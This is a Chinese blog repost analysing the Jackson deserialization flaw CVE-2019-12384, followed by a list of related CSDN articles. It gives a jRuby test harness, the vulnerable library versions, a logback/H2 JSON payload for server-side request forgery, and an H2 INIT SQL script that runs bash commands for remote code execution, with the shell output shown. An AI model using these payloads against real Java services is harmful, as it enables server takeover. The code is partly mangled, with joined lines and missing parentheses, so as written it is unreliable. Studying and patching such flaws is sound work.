java jackson漏洞_CVE-2019-12384:Jackson反序列化漏洞分析

最新推荐文章于 2024-05-03 22:30:16 发布
最新推荐文章于 2024-05-03 22:30:16 发布
阅读量417 收藏
点赞数
文章标签: java jackson漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35242442/article/details/114187404
版权

content = ARGV[0]

puts "Mapping"mapper = ObjectMapper.newmapper.enableDefaultTypingmapper.configure(SerializationFeature::FAIL_ON_EMPTY_BEANS, false);puts "Serializing"obj = mapper.readValue(content, java.lang.Object.java_class) # invokes all the settersputs "objectified"puts "stringified: "+ mapper.writeValueAsString(obj)

脚本主要执行如下操作:

1、第2行,加载classpath子目录中JAR中包含的所有类;

2、第5-13行,配置Jackson以满足漏洞利用条件;

3、第14-17行,反序列化及序列化以JSON形式传递给jRuby的一个Jackson多态对象。

0x03 Gadget

在此次研究中,我们决定使用Java社区中广泛使用的gadget。我们的目标库为Maven中排名前100位的所有库,以便演示攻击影响。

如果大家想复现攻击过程,可以下载如下程序库,将这些库存放在classpath目录中:

jackson-databind-2.9.8

jackson-annotations-2.9.8

jackson-core-2.9.8

logback-core-1.3.0-alpha4

h2-1.4.199

需要注意的是,SSRF攻击中并不需要使用h2库,因为根据我们的经验,大多数情况下Java应用至少会加载一个JDBC驱动。JDBC驱动也是一种类,当传入JDBC url时会被自动实例化,完整URL会以参数形式传入处理。

我们可以使用如下命令来调用之前开发好的脚本:

$ jruby test.rb "["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:"}]"

在脚本第15行,Jackson会使用子对象中的键值递归调用所有set方法。更具体一些,Jackson反射库会调用setUrl(String url),传入所需参数。此后(第17行),整个对象会被再次序列化为一个JSON对象。如果没有定义任何get方法,或者通过显示get方法,此时所有的字段都会被直接序列化。对我们来说比较有趣的是getConnection。作为攻击者,实际上我们感兴趣的是所有的“non pure”(“非纯”)方法,通过控制参数,这些方法会存在一些有趣的“副作用”。

当调用getConnection时,代码会实例化一个内存数据库。由于目标应用生存周期较短,从攻击者视角来看,我们看不到任何影响。为了完成更有意义的任务,我们创建了到远程数据库的一个连接。如果目标应用以远程服务方式进行部署,那么攻击者可以达到SSRF(Server Side Request Forgery)效果,典型攻击场景如下图所示:

b311c461e051f41af3d5e75c013bebf8.png

0x04 从SSRF到RCE

大家可能已经注意到,这些攻击场景都与DoS以及SSRF有关。在这种情况下,虽然攻击者可能影响应用的安全性,但我们还是想与大家分享如何通过一种简单有效的方法,将SSRF转换成完成的RCE攻击链。

为了在应用上下文中获得完整的代码执行权限,我们在环境中部署了加载H2 JDBC驱动的功能。H2是非常快速的一个内存SQL数据库,通常是作为全功能版SQL数据库管理系统(比如Postgresql、MSSql、MySql或者OracleDB)的替代方案。H2配置起来非常方便,并且也支持许多模型,比如内存部署、文件部署或者远程服务器部署。H2可以通过JDBC URL运行SQL脚本,该功能主要目的是方便内存数据库进行INIT迁移。如果单有该功能,攻击者并不能在JVM上下文中执行Java代码。然而,由于H2在JVM框架内实现,因此支持指定包含java代码的自定义别名。我们可以滥用这一点来执行任意代码。

我们可以通过python构建一个简单的HTTP服务器(比如python -m SimpleHttpServer),托管如下inject.sqlINIT文件:

CREATE ALIAS SHELLEXEC AS $$ Stringshellexec(Stringcmd) throws java.io.IOException {String[] command = {"bash", "-c", cmd};java.util.Scanner s = newjava.util.Scanner(Runtime.getRuntime.exec(command).getInputStream).useDelimiter("A");returns.hasNext ? s.next : ""; }$$;CALL SHELLEXEC('id > exploited.txt')

然后通过如下方式运行测试应用:

$ jruby test.rb "["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUN FROM 'http://localhost:8000/inject.sql'"}]"...$ cat exploited.txtuid=501(...) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),501(access_bpf),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh)

这样就能实现RCE效果。返回搜狐,查看更多

全自動資本主義
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反序列化漏洞_Jackson反序列化漏洞
weixin_39839726的博客
12-14 1030
Author:平安银行应用安全团队@Glassy引言今天又看到有一些安全预警平台爆出的Jackson反序列漏洞,要求把Jackson升级到2.9.10.6,所以在下面对漏洞原理和适用范围做一下分析,并给出poc。补丁分析补丁特别简单,也如同漏洞公告一样,增加了几处黑名单。POC构造br.com.anteros.dbcp.AnterosDBCPDataSource先看一下该jar包的mav...
[JAVA安全]JACKSON反序列化
snowlyzz的博客
01-28 2040
JACKSON反序列化原理
CDH6.3.1集群修复Jackson-databind远程代码执行漏洞 CVE-2019-12384
u011250186的博客
08-10 574
CDH6.3.1集群修复Jackson-databind远程代码执行漏洞 CVE-2019-12384
SpringBoot升级/指定jackson版本
热门推荐
CaptainCats的博客
08-31 1万+
漏洞通告】 2月19日,NVD发布安全通告披露了jackson-databind由JNDI注入导致的远程代码执行 漏洞CVE-2020-8840),CVSS评分为9.8 。受影响版本的jackson-databind中由于缺少 某些xbean-reflect/JNDI黑名单类,如org.apache.xbean.propertyeditor.JndiConverter, 可导致攻击者使用JNDI注入的方式实现远程代码执行。目前厂商已发布新版本完成漏洞修复, 请相关用户及时升级进行防护。 由于项目中用
2024年网络安全最新再爆安全漏洞,这次轮到Jackson了,竟由阿里云上报
最新发布
2401_84297455的博客
05-03 1115
熟悉A哥的小伙伴知道,自从Fastjson上次爆出重大安全漏洞之后,我彻底的投入到了Jackson的阵营,工作中也慢慢去Fastjson化。
Jackson序列化远程代码执行漏洞修复
Delphinidae
03-05 4315
安全参考链接:https://mp.weixin.qq.com/s/gHnSfsMuLLlk7lQ4f5Nkdw 漏洞影响:JNDI注入导致远程代码执行 CVE编号:暂时没发布,(fastjson的cveCVE-2020-8840) 解决方案:1 升级jackson-databind >= 2.10.0 2 项目代码中剔除使用enableDefaultTyping类的使用,用官方给出的类替...
Java Web 安全】jackson漏洞探究、利用、预防
qqchaozai的专栏
08-15 4754
前言 阿里云安全公告:2019年7月31日,阿里云应急响应中心监测到有安全研究人员披露Jackson最新反序列化远程代码执行漏洞(CVE-2019-14361和CVE-2019-14439)。同事说怎么jackson这类的json序列化库经常报漏洞,而且基本都是高危漏洞,这些漏洞到底怎么来的,jackson的开发程序员就这么不靠谱么?改不完的BUG?这篇文章就让我们走进jackson的世界,感受...
Jackson 安全总结
王嘟嘟的博客
03-02 756
同Fastjson一样,建一个专门用来总结Jackson的篇章。
Jackson CVE-2017-7525 反序列化漏洞
王嘟嘟的博客
03-01 826
Jackson 相对应fastjson来说利用方面要求更加苛刻,默认情况下无法进行利用。
Jackson-databind引发的漏洞问题分析
kshzhaohui的专栏
03-25 7690
前言 最近公司内部提供了一份应用高危漏洞的清单,其中提到了fastjson和jackson,因为之前对fastjson因为多态问题引发的反序列化问题有过了解,所以打算也做一个简单的分析漏洞简述 2020年08月27日,360CERT监测发现 jackson-databind 发布了 jackson-databind 序列化漏洞 的风险通告,该漏洞编号为 CVE-2020-24616 ,漏洞等级:高危,漏洞评分:7.5。 br.com.anteros:Anteros-DBCP 中存在新的反序列化利用链,
Jackson-databind 反序列化漏洞CVE-2017-7525、CVE-2017-17485)
zzzzz1284的博客
03-13 1279
CVE-2017-7525、CVE-2017-17485
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。阿里云应急响应中心提醒Jackson用户尽快采取安全措施阻止漏洞攻击。
漏洞情报|Jackson-databind反序列化漏洞风险通告(CVE-2020-35490,CVE-2020-35491)
Gblfy_Blog
11-05 2534
反序列化漏洞
Jackson-databind 反序列化漏洞CVE-2020-36179 ~ CVE-2020-36189)
weixin_45626288的博客
12-01 3892
2021年1月7日,jackson-databind官方发布安全通告,披露jackson-databind < 2.9.10.8存在多个反序列化远程代码执行漏洞CVE-2020-36179 ~ CVE-2020-36189),利用该漏洞,攻击者可远程执行代码,控制服务器。 2020年12月17日,jackson-databind官方发布安全通告,披露jackson-databind < 2.9.10.8存在反序列化远程代码执行漏洞CVE-2020-35490/CVE-2020-35491).
jackson反序列化漏洞分析
m0_38043244的博客
06-01 5789
jackson反序列化漏洞分析
java序列化_Java反序列化漏洞总结
weixin_39581845的博客
11-14 2692
前言什么是序列化和反序列化Java 提供了一种对象序列化的机制,该机制中,一个对象可以被表示为一个字节序列,该字节序列包括该对象的数据、有关对象的类型的信息和存储在对象中数据的类型。反序列化就是通过序列化后的字段还原成这个对象本身。但标识不被序列化的字段是不会被还原的。序列化有什么用1)网站相应的session对象存储在硬盘上,那么保存在session中的内容就必须实现相关的序列化操作。2)如果使...
Jackson 远程命令执行漏洞CVE-2019-12384
锋刃科技的博客
06-26 8163
前言 由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enableDefaultTyping方法时,程序就会受到此漏洞的影响,攻击者就可利用构造的包含有恶意代码的json数据包对应用进行攻击,直接获取服务器控制权限。 影响版本 Jackson-databind 2.0.0 ~2.9.9.1 环境搭建 创建一个docker-compose.yml的文件 version: '2' services: web: image: te
jackson框架java反序列化漏洞_Jackson高危反序列化漏洞
weixin_36352719的博客
02-23 349
近日,国家信息安全漏洞共享平台(CNVD)收录了CNVD白帽子(ID:ayound)报送的Jackson框架enableDefaultTyping方法反序列化漏洞(CNVD-2017-04483)。攻击者利用漏洞可在服务器主机上执行任意代码或系统指令,取得网站服务器的控制权。2017年4月17日, Jackson框架曝出存在Java反序列化漏洞,利用漏洞可造成远程代码执行,获取网站控制权,危害极高...
Jackson反序列化代码执行漏洞
I want to know a little more.
06-09 2309
在我们的一次研究过程中,我们分析了一个使用Jackson库对JSON进行反序列化的应用程序。在分析过程中,我们寻找到一个反序列化漏洞,并可以对反序列化的类进行控制。在本文中,我们将向读者展示攻击者如何利用此反序列化漏洞来触发服务器端请求伪造(SSRF)和远程代码执行等攻击。 该研究催生了新的CVE-2019-12384生成,并影响到了一系列RedHat产品: 漏洞攻击条件 正如Jackson在On Jackson CVEs中写到的那样:下面是利用工具需要的要求: (1)应用程序接受由不受信任的客
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-144391
07-14
你提到的 Jackson 最新反序列化漏洞CVE-2019-14361 和 CVE-2019-14439。这些漏洞都是与 Jackson 库中的反序列化功能相关的安全问题。 CVE-2019-14361 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值